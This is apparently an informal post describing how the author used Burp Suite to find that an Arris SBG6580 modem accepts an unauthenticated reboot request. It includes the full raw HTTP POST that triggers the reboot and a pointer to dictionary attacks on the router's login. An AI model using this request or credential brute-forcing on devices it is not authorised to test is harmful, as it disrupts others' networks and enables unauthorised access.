So, I was playing around with Burpsuite a bit to see if I could screw with my modem/router gateway thing to bypass the credentials. No dice there.
Nonetheless, I did find that I could reboot the router without being logged in.
Here's a step-by-step:
- Enter your browser's network settings and turn on the proxy. Use 127.0.0.1:8080. Ensure you don't have any options/checkboxes set for bypassing the proxy for localhost (set by default in Iceweasel 31.7 on Kali).
- Launch Burpsuite. Go to the Proxy tab and the Internet sub-tab. Ensure you see "Intercept is On". Then go to the Options sub-tab and ensure the "Running" checkbox is set for 127.0.0.1.
- Go to your browser and enter the SBG6580's IP address. By default, it's 192.168.0.1.
Optionally, you can right-click in the textbox and choose "Send to Intruder" if you want to try dictionary attacks on the credentials (Google burpsuite cluster bomb).
To reboot the modem, just copy/paste the following text in place of whatever request you've intercepted.
POST /goform/RgConfiguration HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.1/RgConfiguration.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
SaveChanges=Reboot
To get this, I logged in normally (just forwarded those requests normally) and went to the Configuration page. I clicked "Reboot" but copied that text and just dropped the request. I then used the browser back button to get back to the interface and hit Logout (forwarding the requests normally again) and went back to the login page. Now, without being logged in, I just pasted the request for the reboot and forwarded it. It rebooted even though I wasn't logged in.